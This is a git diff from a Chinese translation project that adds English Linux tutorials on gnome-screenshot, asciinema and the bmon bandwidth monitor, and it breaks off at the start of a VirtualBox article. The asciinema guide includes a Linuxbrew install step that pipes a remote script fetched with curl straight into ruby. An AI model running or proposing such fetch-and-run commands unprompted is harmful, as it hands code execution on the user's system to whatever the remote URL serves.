https://www.howtoforge.com/tutorial/vim-modeline-settings/ + +作者:[ Ansh][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/vim-modeline-settings/ +[1]:https://www.howtoforge.com/tutorial/vim-modeline-settings/#usage +[2]:https://www.howtoforge.com/tutorial/vim-modeline-settings/#vim-modeline +[3]:https://www.howtoforge.com/tutorial/vim-modeline-settings/#conclusion +[4]:https://www.howtoforge.com/tutorial/vim-editor-plugins-for-software-developers-3/ +[5]:http://vim.wikia.com/wiki/Modeline_magic +[6]:https://tools.cisco.com/security/center/viewAlert.x?alertId=13223 +[7]:http://usevim.com/2012/03/28/modelines/ +[8]:https://tools.cisco.com/security/center/viewAlert.x?alertId=5169 diff --git a/sources/tech/20170203 A comprehensive guide to taking screenshots in Linux using gnome-screenshot.md b/sources/tech/20170203 A comprehensive guide to taking screenshots in Linux using gnome-screenshot.md new file mode 100644 index 0000000000..6ef77ca290 --- /dev/null +++ b/sources/tech/20170203 A comprehensive guide to taking screenshots in Linux using gnome-screenshot.md @@ -0,0 +1,292 @@ +A comprehensive guide to taking screenshots in Linux using gnome-screenshot +============================================================ + +### On this page + +1. [About Gnome-screenshot][13] +2. [Gnome-screenshot Installation][14] +3. [Gnome-screenshot Usage/Features][15] + 1. [Capturing current active window][1] + 2. [Window border][2] + 3. [Adding effects to window borders][3] + 4. [Screenshot of a particular area][4] + 5. [Include mouse pointer in snapshot][5] + 6. [Delay in taking screenshots][6] + 7. [Run the tool in interactive mode][7] + 8. [Directly save your screenshot][8] + 9. [Copy to clipboard][9] + 10. [Screenshot in case of multiple displays][10] + 11. [Automate the screen grabbing process][11] + 12. [Getting help][12] +4. [Conclusion][16] + +There are several screenshot taking tools available in the market but most of them are GUI based. If you spend time working on the Linux command line, and are looking for a good, feature-rich command line-based screen grabbing tool, you may want to try out [gnome-screenshot][17]. In this tutorial, I will explain this utility using easy to understand examples. + +Please note that all the examples mentioned in this tutorial have been tested on Ubuntu 16.04 LTS, and the gnome-screenshot version we have used is 3.18.0. + +### About Gnome-screenshot + +Gnome-screenshot is a GNOME tool which - as the name suggests - is used for capturing the entire screen, a particular application window, or any other user defined area. The tool provides several other features, including the ability to apply beautifying effects to borders of captured screenshots. + +### Gnome-screenshot Installation + +The gnome-screenshot tool is pre-installed on Ubuntu systems, but if for some reason you need to install the utility, you can do that using the following command: + +sudo apt-get install gnome-screenshot + +Once the tool is installed, you can launch it by using following command: + +gnome-screenshot + +### Gnome-screenshot Usage/Features + +In this section, we will discuss how the gnome-screenshot tool can be used and what all features it provides. + +By default, when the tool is run without any command line options, it captures the complete screen. + +[ + ![Starting Gnome Screenshot](https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/gnome-default.png) +][18] + +### Capturing current active window + +If you want, you can limit the screenshot to the current active window by using the -w option. + +gnome-screenshot -w + +[ + ![Capturing current active window](https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/activewindow.png) +][19] + +### +Window border + +By default, the utility includes the border of the window it captures, although there's also a specific command line option -b that enables this feature (in case you want to use it somewhere). Here's how it can be used: + +gnome-screenshot -wb + +Of course, you need to use the -w option with -b so that the captured area is the current active window (otherwise, -b will have no effect). + +Moving on and more importantly, you can also remove the border of the window if you want. This can be done using the -B command line option. Following is an example of how you can use this option: + +gnome-screenshot -wB + +Here is an example snapshot: + +[ + ![Window border](https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/removeborder.png) +][20] + +### Adding effects to window borders + +With the help of the gnome-screenshot tool, you can also add various effects to window borders. This can be done using the --border-effect option. + +You can add any of the effects provided by the utility such as 'shadow' effect (which adds drop shadow to the window), 'border' effect (adds rectangular space around the screenshot), and 'vintage' effect (desaturating the screenshot slightly, tinting it and adding rectangular space around it). + +gnome-screenshot --border-effect=[EFFECT] + +For example, to add the shadow effect, run the following command + +gnome-screenshot –border-effect=shadow + +Here is an example snapshot of the shadow effect: + +[ + ![Adding effects to window borders](https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/shadoweffect-new.png) +][21] + +Please note that the above screenshot focuses on a corner of the terminal to give you a clear view of the shadow effect. + +### Screenshot of a particular area + +If you want, you can also capture a particular area of your computer screen using the gnome-screenshot utility. This can be done by using the -a command line option. + +gnome-screenshot -a + +When the above command is run, your mouse pointer will change into a ‘+’ sign. In this mode, you can grab a particular area of your screen by moving the mouse with left-click pressed. + +Here is an example screenshot wherein I cropped a small area of my terminal window. + +[ + ![example screenshot wherein I cropped a small area of my terminal window](https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/area.png) +][22] + +### +Include mouse pointer in snapshot + +By default, whenever you take screenshot using this tool, it doesn’t include mouse pointer. However, the utility allows you to include the pointer, something which you can do using the -p command line option. + +gnome-screenshot -p + +Here is an example snapshot + +[ + ![Include mouse pointer in snapshot](https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/includecursor.png) +][23] + +### Delay in taking screenshots + +You can also introduce time delay while taking screenshots. For this, you have to assign a value to the --delay option in seconds. + +gnome-screenshot –delay=[SECONDS] + +For example: + +gnome-screenshot --delay=5 + +Here is an example screenshot + +[ + ![Delay in taking screenshots](https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/delay.png) +][24] + +### Run the tool in interactive mode + +The tool also allows you to access all its features using a single option, which is -i. Using this command line option, user can select one or more of the tool’s features at run time. + +$ gnome-screenshot -i + +Here is an example screenshot + +[ + ![Run the tool in interactive mode](https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/interactive.png) +][25] + +As you can see in the snapshot above, the -i option provides access to many features - such as grabbing the whole screen, grabbing the current window, selecting an area to grab, delay option, effects options - all in an interactive mode. + +### Directly save your screenshot + +If you want, you can directly save your screenshot from the terminal to your present working directory, meaning you won't be asked to enter a file name for the captured screenshot after the tool is run. This feature can be accessed using the --file command line option which, obviously, requires a filename to be passed to it. + +gnome-screenshot –file=[FILENAME] + +For example: + +gnome-screenshot --file=ashish + +Here is an example snapshot: + +[ + ![Directly save your screenshot](https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/ashish.png) +][26] + +### Copy to clipboard + +The gnome-screenshot tool also allows you to copy your screenshot to clipboard. This can be done using the -c command line option. + +gnome-screenshot -c + +[ + ![Copy to clipboard](https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/copy.png) +][27] + +In this mode, you can, for example, directly paste the copied screenshot in any of your image editors (such as GIMP). + +### Screenshot in case of multiple displays + +If there are multiple displays attached to your system and you want to take snapshot of a particular one, then you can use the --display command line option. This option requires a value which should be the display device ID (ID of the screen being grabbed). + +gnome-screenshot --display=[DISPLAY] + +For example: + +gnome-screenshot --display=VGA-0 + +In the above example, VGA-0 is the id of the display that I am trying to capture. To find the ID of the display that you want to screenshot, you can use the following command: + +xrandr --query + +To give you an idea, this command produced the following output in my case: + +**$ xrandr --query** +Screen 0: minimum 320 x 200, current 1366 x 768, maximum 8192 x 8192 +**VGA-0** connected primary 1366x768+0+0 (normal left inverted right x axis y axis) 344mm x 194mm +1366x768 59.8*+ +1024x768 75.1 75.0 60.0  +832x624 74.6  +800x600 75.0 60.3 56.2  +640x480 75.0 60.0  +720x400 70.1  +**HDMI-0** disconnected (normal left inverted right x axis y axis) + +### Automate the screen grabbing process + +As we have discussed earlier, the -a command line option helps us to grab a particular area of the screen. However, we have to select the area manually using the mouse. If you want, you can automate this process using gnome-screenshot, but in that case, you will have to use an external tool known as xdotool, which is capable of simulating key presses and even mouse events. + +For example: + +(gnome-screenshot -a &); sleep 0.1 && xdotool mousemove 100 100 mousedown 1 mousemove 400 400 mouseup 1 + +The mousemove sub-command automatically positions the mouse pointer at specified coordinates X and Y on screen (100 and 100 in the example above). The mousedown subcommand fires an event which performs the same operation as a click (since we wanted left-click, so we used the argument 1) , whereas the mouseup subcommand fires an event which performs the task of a user releasing the mouse-button. + +So all in all, the xdotool command shown above does the same area-grabbing work that you otherwise have to manually do with mouse - specifically, it positions the mouse pointer to 100, 100 coordinates on the screen, selects the area enclosed until the pointer reaches 400,400 coordinates on then screen. The selected area is then captured by gnome-screenshot. + +Here, is the screenshot of the above command: + +[ + ![screenshot of the above command](https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/automatedcommand.png) +][28] + +And this is the output: + +[ + ![Screenshot output](https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/outputxdo.png) +][29] + +For more information on xdotool, head [here][30]. + +### Getting help + +If you have a query or in case you are facing a problem related to any of the command line options, then you can use the --help, -? or -h options to get related information. + +gnome-screenshot -h + +For more information on gnome-screenshot, you can go through the command’s manual page or man page. + +man gnome-screenshot + +### Conclusion + +I will recommend that you to use this utlity atleast once as it's not only easy to use for beginners, but also offers a feature-rich experience for advanced usage. Go ahead and give it a try. + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/ + +作者:[Himanshu Arora][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/ +[1]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#capturing-current-active-window +[2]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#window-border +[3]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#adding-effects-to-window-borders +[4]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#screenshot-of-a-particular-area +[5]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#include-mouse-pointer-in-snapshot +[6]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#delay-in-taking-screenshots +[7]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#run-the-tool-in-interactive-mode +[8]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#directly-save-your-screenshot +[9]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#copy-to-clipboard +[10]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#screenshot-in-case-of-multiple-displays +[11]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#automate-the-screen-grabbing-process +[12]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#getting-help +[13]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#about-gnomescreenshot +[14]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#gnomescreenshot-installation +[15]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#gnomescreenshot-usagefeatures +[16]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/#conclusion +[17]:https://linux.die.net/man/1/gnome-screenshot +[18]:https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/big/gnome-default.png +[19]:https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/big/activewindow.png +[20]:https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/big/removeborder.png +[21]:https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/big/shadoweffect-new.png +[22]:https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/big/area.png +[23]:https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/big/includecursor.png +[24]:https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/big/delay.png +[25]:https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/big/interactive.png +[26]:https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/big/ashish.png +[27]:https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/big/copy.png +[28]:https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/big/automatedcommand.png +[29]:https://www.howtoforge.com/images/taking-screenshots-in-linux-using-gnome-screenshot/big/outputxdo.png +[30]:http://manpages.ubuntu.com/manpages/trusty/man1/xdotool.1.html diff --git a/sources/tech/20170203 Record and Replay Terminal Session with Asciinema on Linux.md b/sources/tech/20170203 Record and Replay Terminal Session with Asciinema on Linux.md new file mode 100644 index 0000000000..7942aac629 --- /dev/null +++ b/sources/tech/20170203 Record and Replay Terminal Session with Asciinema on Linux.md @@ -0,0 +1,281 @@ +### Record and Replay Terminal Session with Asciinema on Linux + +![](https://linuxconfig.org/images/asciimena-video-example.jpg?58942057) + +Contents + +* * [1. Introduction][11] + * [2. Difficulty][12] + * [3. Conventions][13] + * [4. Standard Repository Installation][14] + * [4.1. Arch Linux][1] + * [4.2. Debian][2] + * [4.3. Ubuntu][3] + * [4.4. Fedora][4] + * [5. Installation From Source][15] + * [6. Prerequisites][16] + * [6.1. Arch Linux][5] + * [6.2. Debian][6] + * [6.3. Ubuntu][7] + * [6.4. Fedora][8] + * [6.5. CentOS][9] + * [7. Linuxbrew Installation][17] + * [8. Asciinema Installation][18] + * [9. Recording Terminal Session][19] + * [10. Replay Recorded Terminal Session][20] + * [11. Embedding Video as HTML][21] + * [12. Conclusion][22] + * [13. Troubleshooting][23] + * [13.1. asciinema needs a UTF-8][10] + +### Introduction + +Asciinema is a lightweight and very efficient alternative to a `Script`terminal session recorder. It allows you to record, replay and share your JSON formatted terminal session recordings. The main advantage in comparison to desktop recorders such as Recordmydesktop, Simplescreenrecorder, Vokoscreen or Kazam is that Asciinema records all standard terminal input, output and error as a plain ASCII text with ANSI escape code .  + +As a result, JSON format file is minuscule in size even for a longer terminal session. Furthermore, JSON format gives the user the ability to share the Asciinema JSON output file via simple file transfer, on the public website as part of embedded HTML code or share it on Asciinema.org using asciinema account. Lastly, in case that you have made some mistake during your terminal session, your recorded terminal session can be retrospectively edited using any text editor, that is if you know your way around ANSI escape code syntax. + +### Difficulty + +EASY + +### Conventions + +* **#** - requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command +* **$** - given command to be executed as a regular non-privileged user + +### Standard Repository Installation + +It is very likely that asciinema is installable as part fo your distribution repository. However, if Asciinema is not available on your system or you wish to install the latest version, you can use Linuxbrew package manager to perform Asciinema installation as described below in the "Installation From Source" section. + +### Arch Linux + +``` +# pacman -S asciinema +``` + +### Debian + +``` +# apt install asciinema +``` + +### Ubuntu + +``` +$ sudo apt install asciinema +``` + +### Fedora + +``` +$ sudo dnf install asciinema +``` + +### Installation From Source + +The easiest and recommended way to install the latest Asciinema version from source is by use of Linuxbrew package manager. + +### Prerequisites + +The following list of prerequisites fulfils dependency requirements for both, Linuxbrew and Asciinema. + +* git +* gcc +* make +* ruby + +Before you proceed with Linuxbrew installation make sure that the above packages are istalled on your Linux system. + +### Arch Linux + +``` +# pacman -S git gcc make ruby +``` + +### Debian + +``` +# apt install git gcc make ruby +``` + +### Ubuntu + +``` +$ sudo apt install git gcc make ruby +``` + +### Fedora + +``` +$ sudo dnf install git gcc make ruby +``` + +### CentOS + +``` +# yum install git gcc make ruby +``` + +### Linuxbrew Installation + +The Linuxbrew package manager is a fork of the popular Homebrew package manager used on Apple's MacOS operating system. Homebrew is known for its ease of use, which is to be seen shortly, when we use Linuxbrew to install Asciinema. Run the bellow command to install Linuxbrew on your Linux distribution: +``` +$ ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Linuxbrew/install/master/install)" +``` +Linuxbrew is now installed under your `$HOME/.linuxbrew/`. What remains is to make it part of your executable `PATH` environment variable. +``` +$ echo 'export PATH="$HOME/.linuxbrew/bin:$PATH"' >>~/.bash_profile +$ . ~/.bash_profile +``` +To confirm the Linuxbrew installation you can use `brew` command to query its version: +``` +$ brew --version +Homebrew 1.1.7 +Homebrew/homebrew-core (git revision 5229; last commit 2017-02-02) +``` + +### Asciinema Installation + +With the Linuxbrew now installed, the installation of Asciinema should be easy as single one-liner: +``` +$ brew install asciinema +``` +Check the correctnes of asciinema installation: +``` +$ asciinema --version +asciinema 1.3.0 +``` + +### Recording Terminal Session + +After all that hard work with the installation, it is finally time to have some fun. Asciinema is an extremely easy to use software. In fact, the current version 1.3 has only few command line options available and one of them is `--help`.  + +Let's start by recording a terminal session using the `rec` option. The following command will start recording your terminal session after which you will have an option to either discard your recording or upload it on asciinema.org website for a future reference. +``` +$ asciinema rec +``` +Once you run the above command, you will be notified that your asciinema recording session has started, and that the recording can be stopped by entering `CTRL+D` key sequence or execution of `exit` command. If you are on Debian/Ubuntu/Mint Linux you can try this as your first asciinema recording: +``` +$ su +Password: +# apt install sl +# exit +$ sl +``` +Once you enter the last exit command you will be asked: +``` +$ exit +~ Asciicast recording finished. +~ Press to upload, to cancel. + +https://asciinema.org/a/7lw94ys68gsgr1yzdtzwijxm4 +``` +If you do not feel like to upload your super secret kung-fu command line skills to asciinema.org, you have an option to store Asciinema recording as a local file in JSON format. For example, the following asciinema recording will be stored as `/tmp/my_rec.json`: +``` +$ asciinema rec /tmp/my_rec.json +``` +Another extremely useful asciinema feature is time trimming. If you happen to be a slow writer or perhaps you are doing multitasking, the time between entering and execution of your commands can stretch greatly. Asciinema records your keystrokes real-time, meaning every pause you make will reflect on the lenght of your resulting video. Use `-w` option to shorten the time between your keystrokes. For example, the following command trims the time between your keystrokes to 0.2 seconds: +``` +$ asciinema rec -w 0.2 +``` + +### Replay Recorded Terminal Session + +There are two options to replay your recorded terminal sessions. First, play you terminal session directly from asciinema.org. That is, provided that you have previously uploaded your recording to asciinema.org and you have valid URL: +``` +$ asciinema play https://asciinema.org/a/7lw94ys68gsgr1yzdtzwijxm4 +``` +Alternatively, use your locally stored JSON file: +``` +$ asciinema play /tmp/my_rec.json +``` +Use `wget` command to download your previously uploaded recording. Simply add `.json` to your existing URL: +``` +$ wget -q -O steam_locomotive.json https://asciinema.org/a/7lw94ys68gsgr1yzdtzwijxm4.json +$ asciinema play steam_locomotive.json +``` + +### Embedding Video as HTML + +Lastly, Asciinema also comes with a stand-alone JavaScript player. Which means that it is easy to share your terminal session recordings on your website. The below lines illustrate this idea with a simple `index.html`code. First, download all necessary parts: +``` +$ cd /tmp/ +$ mkdir steam_locomotive +$ cd steam_locomotive/ +$ wget -q -O steam_locomotive.json https://asciinema.org/a/7lw94ys68gsgr1yzdtzwijxm4.json +$ wget -q https://github.com/asciinema/asciinema-player/releases/download/v2.4.0/asciinema-player.css +$ wget -q https://github.com/asciinema/asciinema-player/releases/download/v2.4.0/asciinema-player.js +``` +Next, create a new `/tmp/steam_locomotive/index.html` file with a following content: +``` + + + + + + + + + +``` +Once ready, open up your web browser, hit CTRL+O and open your newly created `/tmp/steam_locomotive/index.html` file. + +### Conclusion + +As mentioned before, the main advantage for recording your terminal sessions with the Asciinema recorder is the minuscule output file which makes your videos extremely easy to share. The example above produced a file containing 58 472 characters, that is 58KB for 22 seconds video session. When reviewing the output JSON file, even this number is greatly inflated, mostly due to the fact that we have seen a Steam Locomotive rushing across our terminal. Normal terminal session of this length should produce a much smaller output file.  + +Next, time when you are about to ask a question on forums about your Linux configuration issue and having a hard time to explain how to reproduce your problem, simply run: +``` +$ asciinema rec +``` +and paste the resulting URL into your forum post. + +### Troubleshooting + +### asciinema needs a UTF-8 + +Error message: +``` +asciinema needs a UTF-8 native locale to run. Check the output of `locale` command. +``` +Solution: +Generate and export UTF-8 locale. For example: +``` +$ localedef -c -f UTF-8 -i en_US en_US.UTF-8 +$ export LC_ALL=en_US.UTF-8 +``` + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux + +作者:[Lubos Rendek][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux +[1]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h4-1-arch-linux +[2]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h4-2-debian +[3]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h4-3-ubuntu +[4]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h4-4-fedora +[5]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h6-1-arch-linux +[6]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h6-2-debian +[7]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h6-3-ubuntu +[8]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h6-4-fedora +[9]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h6-5-centos +[10]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h13-1-asciinema-needs-a-utf-8 +[11]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h1-introduction +[12]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h2-difficulty +[13]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h3-conventions +[14]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h4-standard-repository-installation +[15]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h5-installation-from-source +[16]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h6-prerequisites +[17]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h7-linuxbrew-installation +[18]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h8-asciinema-installation +[19]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h9-recording-terminal-session +[20]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h10-replay-recorded-terminal-session +[21]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h11-embedding-video-as-html +[22]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h12-conclusion +[23]:https://linuxconfig.org/record-and-replay-terminal-session-with-asciinema-on-linux#h13-troubleshooting diff --git a/sources/tech/20170203 bmon – A Powerful Network Bandwidth Monitoring and Debugging Tool for Linux.md b/sources/tech/20170203 bmon – A Powerful Network Bandwidth Monitoring and Debugging Tool for Linux.md new file mode 100644 index 0000000000..407f1ad06c --- /dev/null +++ b/sources/tech/20170203 bmon – A Powerful Network Bandwidth Monitoring and Debugging Tool for Linux.md @@ -0,0 +1,197 @@ +bmon – A Powerful Network Bandwidth Monitoring and Debugging Tool for Linux +============================================================ + +bmon is a simple yet powerful, text-based [network monitoring and debugging tool][1] for Unix-like systems, which captures networking related statistics and displays them visually in a human friendly format. It is a reliable and effective real-time bandwidth monitor and rate estimator. + +It can read input using an assortment of input modules and presents output in various output modes, including an interactive curses user interface as well as a programmable text output for scripting purposes. + +**Suggested Read:** [20 Command Line Tools to Monitor Linux Performance][2] + +### Install bmon Bandwidth Monitoring Tool in Linux + +Almost all Linux distributions has bmon package in the default repositories and can be easily install from default package manger, but the available version might be little older. + +``` +$ sudo yum install bmon [On RHEL/CentOS/Fedora] +$ sudo dnf install bmon [On Fedora 22+] +$ sudo apt-get install bmon [On Debian/Ubuntu/Mint] +``` + +Alternatively, you can get `.rpm` and `.deb` packages for your Linux distribution from [https://pkgs.org/download/bmon][3]. + +If you wanted to have a most recent version of bmon (i.e version 4.0), you need to build it from source using following commands. + +#### On CentOS, RHEL and Fedora + +``` +$ git clone https://github.com/tgraf/bmon.git +$ cd bmon +$ sudo yum install make libconfuse-devel libnl3-devel libnl-route3-devel ncurses-devel +$ sudo ./autogen.sh +$ sudo./configure +$ sudo make +$ sudo make install +``` + +#### On Debian, Ubuntu and Linux Mint + +``` +$ git clone https://github.com/tgraf/bmon.git +$ cd bmon +$ sudo apt-get install build-essential make libconfuse-dev libnl-3-dev libnl-route-3-dev libncurses-dev pkg-config dh-autoreconf +$ sudo ./autogen.sh +$ sudo ./configure +$ sudo make +$ sudo make install +``` + +### How to Use bmon Bandwidth Monitoring Tool in Linux + +Run it as below (for starters: RX means received bytes per second and TX refers to transmitted bytes per second): + +``` +$ bmon +``` + +[ + ![bmon - Linux Bandwidth Monitoring](http://www.tecmint.com/wp-content/uploads/2017/02/bmon-Linux-Bandwidth-Monitoring.gif) +][4] + +To view more detailed graphical statistics/information of bandwidth usage, press `d` key and refer screnshot below. + +[ + ![bmon - Detailed Bandwidth Statistics](http://www.tecmint.com/wp-content/uploads/2017/02/bmon-Detailed-Bandwidth-Statistics.gif) +][5] + +Press `[Shift + ?]` to view the quick reference below. To exit the interface, press [Shift + ?] again. + +[ + ![bmon - Quick Reference](http://www.tecmint.com/wp-content/uploads/2017/02/bmon-Quick-Reference.png) +][6] + +bmon – Quick Reference + +To view statistics of a given interface, select it using the `Up` and `Down` arrows. However, to monitor a specific interface only, specify it as an argument on the command line as follows. + +**Suggested Read:** [13 Tools to Monitor Linux Performance][7] + +The flag `-p` sets a policy defining which network interfaces to display, in the example below, we will be monitoring the `enp1s0` network interface: + +``` +$ bmon -p enp1s0 +``` +[ + ![bmon - Monitor Ethernet Bandwidth](http://www.tecmint.com/wp-content/uploads/2017/02/bmon-Monitor-Ethernet-Bandwidth.png) +][8] + +bmon – Monitor Ethernet Bandwidth + +To use bit per second instead of bytes per second, use the `-b` flag like so: + +``` +$ bmon -bp enp1s0 +``` + +We can also define the intervals per second with the `-r` flag as follows: + +``` +$ bmon -r 5 -p enp1s0 +``` + +### How to Use bmon Input Modules + +bmon has a number of input modules that offer statistical data about interfaces, which includes: + +1. netlink – employs the Netlink protocol to collect interface and traffic control statistics from the kernel. This is the default input module. +2. proc — reads interface statistics from the /proc/net/dev file. It is considered a legacy interface and offered for backwards compatibly. It is a fallback module in case the Netlink interface is not available. +3. dummy – this is a programmable input module for debugging and testing purposes. +4. null – disables data collection. + +To find additional info about a module, invoke the it with the “help” option set as follows: + +``` +$ bmon -i netlink:help +``` + +The next command will invoke bmon with the proc input module enabled: + +``` +$ bmon -i proc -p enp1s0 +``` + +### How to Use bmon Output Modules + +bmon also uses output modules to display or export the statistical data collected by the input modules above, which includes: + +1. curses – this is an interactive curses based text user interface, it offers real time rate estimations and a graphical representation of each attribute. It is the default output mode. +2. ascii – is a straightforward programmable text output meant for human consumption. It can display list of interfaces, detailed counters and graphs to the console. It is the default fallback output mode when curses is not available. +3. format – is a fully scriptable output mode, it’s meant for consumption by other programs-meaning we can use its output values at a later time in scripts or programs for analysis and more. +4. null – this disables output. + +To get more info concerning a module, run the it with the “help” flag set like so: + +``` +$ bmon -o curses:help +``` + +The command that follows will invoke bmon in ascii output mode: + +``` +$ bmon -p enp1s0 -o ascii +``` +[ + ![bmon - Ascii Output Mode](http://www.tecmint.com/wp-content/uploads/2017/02/bmon-Ascii-Output-Mode.png) +][9] + +bmon – Ascii Output Mode + +We can run the format output module as well, then use the values obtained for scripting or in another program: + +``` +$ bmon -p enp1s0 -o format +``` +[ + ![bmon - Format Output Mode](http://www.tecmint.com/wp-content/uploads/2017/02/bmon-format-output-mode.png) +][10] + +bmon – Format Output Mode + +For additional usage info, options and examples, read the bmon man page: + +``` +$ man bmon +``` + +Visit the bmon Github repository: [https://github.com/tgraf/bmon][11]. + +That’s all for now, test the various features of bmon in different scenarios and share your thoughts about it with us via the comment section below. + +-------------------------------------------------------------------------------- + +译者简介: + +Aaron Kili is a Linux and F.O.S.S enthusiast, an upcoming Linux SysAdmin, web developer, and currently a content creator for TecMint who loves working with computers and strongly believes in sharing knowledge. + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/bmon-network-bandwidth-monitoring-debugging-linux/ + +作者:[Aaron Kili][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ + +[1]:http://www.tecmint.com/bcc-best-linux-performance-monitoring-tools/ +[2]:http://www.tecmint.com/command-line-tools-to-monitor-linux-performance/ +[3]:https://pkgs.org/download/bmon +[4]:http://www.tecmint.com/wp-content/uploads/2017/02/bmon-Linux-Bandwidth-Monitoring.gif +[5]:http://www.tecmint.com/wp-content/uploads/2017/02/bmon-Detailed-Bandwidth-Statistics.gif +[6]:http://www.tecmint.com/wp-content/uploads/2017/02/bmon-Quick-Reference.png +[7]:http://www.tecmint.com/linux-performance-monitoring-tools/ +[8]:http://www.tecmint.com/wp-content/uploads/2017/02/bmon-Monitor-Ethernet-Bandwidth.png +[9]:http://www.tecmint.com/wp-content/uploads/2017/02/bmon-Ascii-Output-Mode.png +[10]:http://www.tecmint.com/wp-content/uploads/2017/02/bmon-format-output-mode.png +[11]:https://github.com/tgraf/bmon diff --git a/sources/tech/20170204 How to Configure Network Between Guest VM and Host in Oracle VirtualBox.md b/sources/tech/20170204 How to Configure Network Between Guest VM and Host in Oracle VirtualBox.md new file mode 100644 index 0000000000..75e2e886ba --- /dev/null +++ 